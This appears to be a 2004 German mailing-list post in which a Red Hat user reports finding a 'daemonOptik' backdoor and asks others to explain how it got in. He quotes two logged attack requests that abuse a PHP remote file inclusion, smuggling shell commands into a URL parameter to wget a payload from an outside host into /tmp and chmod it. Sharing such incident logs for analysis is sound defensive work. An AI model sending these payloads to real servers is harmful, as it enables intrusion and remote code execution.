[redhat-list-de] daemonOptik Backdoor funcionando 18383
Matthias Borrack
mailingliste at sinath.de
Fri May 21 20:54:12 UTC 2004
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hallo zusammen,
meine Begeisterung für das obige hält sich in Grenzen, aber für den
Anfang war es wohl ganz gut.
Mit interessiert nur, ob das schon jemand kennt.
Interessant ist der Weg nach "innen":
"GET
/index.php?page=http://xxx.xxxxx.com/cse.gif?&cmd=cd%20/tmp;wget%20http://xxx.xxxxx.com.br/informatica/smartboy/index.html
HTTP/1.1"
"GET
/index.php?page=http://a1ts.250free.com/cse.gif?&cmd=cd%20/tmp;chmod%20777%20index.html.2
HTTP/1.1"
Eigentlich war ich der Meinung, dies wäre zum einen seitens PHP nicht
möglich, zum anderen sollte die index.php eigentlich genau solche
Syntaxe abfangen.
Ehrlich gesagt, ergibt der ganze Aufruf im Moment für mich nicht
wirklich Sinn, vielleicht ist auch schon zu spät ;)
Falls mir jemand Info's geben kann, wäre ich begeistert und dankbar.
Wer es sezieren möchte, kann es auch haben.
Übrigens: GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
cu/2 iae
Matthias
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFArmxzWTMfCbz57ScRAlzPAJ0Y/GybHEqFw2v7jIKPKvNf0srlzgCeNJic
cHwRj6iH9CoRv8T8pdJjYRY=
=TBPk
-----END PGP SIGNATURE-----
More information about the redhat-list-de
mailing list